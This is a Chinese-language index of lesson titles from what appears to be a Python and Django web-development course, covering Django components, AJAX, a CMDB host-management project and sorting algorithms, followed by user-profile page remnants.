Django之url、Views Django之Model操作 Django之模版 Django之Session Django之Session与Cookie Django之CSRF原理详解 Django之中间件详解 Django之缓存实例详解 Django之信号 Django之Form组件验证 作业 第23周 主机管理项目需求分析 主机管理项目架构设计 主机管理项目初始构建 主机管理项目编写插件基类 主机管理项目命令分发器 主机管理项目提取主机列表 主机管理项目提取yaml配置文件_ 主机管理项目动态调用插件进行数据解析 主机管理项目对模块中的参数进行解析 第24周 本节题纲 上节内容回顾 ModelForm操作及验证 ajax操作-原生ajax ajax操作-JQuery的ajax ajax操作-伪ajax(iframe) ajax操作-时机选择 文件上传(3种方式)-1 文件上传-时机选择及预览-2 图片验证码 KindEditor基本使用和文件操作 作业 第25周 今日内容概要 博客系统示例预览 组合搜索组件 JSONP跨域请求jQuery方式 JSONP跨域请求本质 XSS过滤以及单例模式 博客系统表结构讲解 博客系统功能讲解 CMDB介绍 CMDB实现的三种方式 CMDB Agent客户端示例 第26周 今日内容概要以及CMDB介绍 前端插件定制之表头 前端插件定制之表内容 第27周 前端插件定制之定制td内容以及属性 CMDB插件示例演示 算法介绍与列表查找 冒泡 选择 插入排序 快排 堆排序 第28周 堆排序复习 归并排序 希尔排序 算法练习 栈和队列 数据结构其他

2018-06-13

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除